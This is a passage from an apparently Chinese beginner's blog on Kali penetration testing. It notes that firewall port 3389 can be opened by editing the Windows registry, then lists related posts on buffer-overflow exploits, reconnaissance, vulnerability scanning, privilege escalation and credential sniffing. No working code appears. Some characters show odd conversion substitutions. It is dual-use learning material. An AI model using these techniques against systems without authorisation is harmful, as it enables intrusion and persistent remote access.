打開防火牆的3389端口,也能夠用修改註冊表來實現【windows系統下幾乎全部操做均可用修改註冊表來實現】

##可以使用regsnap【進行註冊表實現現狀快照,可經過比較修改註冊表先後鍵值變化,找出具體目標,動做需快速】

小白日記,未完待續……

小白日記17:kali滲透測試之緩衝區溢出實例-windows,POP3,SLmail的更多相關文章

  1. 小白日記18:kali滲透測試之緩衝區溢出實例(二)--Linux,穿越火線1.9.0

    Linux系統下穿越火線-緩衝區溢出 原理:crossfire 1.9.0 版本接受入站 socket 鏈接時存在緩衝區溢出漏洞. 工具: 調試工具:edb: ###python在漏洞溢出方面的滲透測 ...

  2. 小白日記7:kali滲透測試之主動信息收集-發現(一)--二層發現:arping/shell腳本,Netdiscover,scapy

    主動信息收集 被動信息收集可能不許確,能夠用主動信息收集驗證   特色:直接與目標系統交互通訊,沒法避免留下訪問痕跡 解決方法:1.使用受控的第三方電腦進行探測,使用代理 (作好被封殺的準備)   2 ...

  3. 小白日記15:kali滲透測試之弱點掃描-漏掃三招、漏洞管理、CVE、CVSS、NVD

    發現漏洞 弱點發現方法: 1.基於端口服務掃描結果版本信息,比對其是否爲最新版本,若不是則去其 官網查看其補丁列表,而後去逐個嘗試,可是此法弊端很大,由於各類端口應用比較多,形成耗時大. 2.搜索已公 ...

  4. 小白日記13:kali滲透測試之服務掃描(三)-SMTB掃描、防火牆識別、負載均衡識別、WAF識別

    SMTP掃描 SMTP(Simple Mail Transfer Protocol)即簡單郵件傳輸協議,它是一組用於由源地址到目的地址傳送郵件的規則,由它來控制信件的中轉方式.SMTP協議屬於TCP/ ...

  5. 小白日記8:kali滲透測試之主動信息收集(二)三層發現:ping、traceroute、scapy、nmap、fping、Hping

    三層發現 三層協議有:IP以及ICMP協議(internet管理協議).icmp的做用是用來實現intenet管理的,進行路徑的發現,網路通訊狀況,或者目標主機的狀態:在三層發現中主要使用icmp協議 ...

  6. 小白日記6:kali滲透測試之被動信息收集(五)-Recon-ng

    Recon-ng Recon-NG是由python編寫的一個開源的Web偵查(信息收集)框架.Recon-ng框架是一個全特性的工具,使用它能夠自動的收集信息和網絡偵查.其命令格式與Metasploi ...

  7. 小白日記3:kali滲透測試之被動信息收集(二)-dig、whios、dnsenum、fierce

    一.DIG linux下查詢域名解析有兩種選擇,nslookup或者dig.Dig(Domain Information Groper)是一個在類Unix命令行模式下查詢DNS包括NS記錄,A記錄,M ...

  8. 小白日記22:kali滲透測試之提權(二)--抓包嗅探

    抓包嗅探 經過抓包嗅探目標機器的流量,發現帳號密碼. Windows系統 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只會抓取識別傳輸密碼的明文協議, ...

  9. 小白日記21:kali滲透測試之提權(一)--本地提權

    本地提權 簡單地說,本地提權漏洞就是說一個原本很是低權限.受限制的用戶,能夠提高到系統至高無上的權限.權限提高漏洞一般是一種"輔助"性質的漏洞,當黑客已經經過某種手段進入了目標機器 ...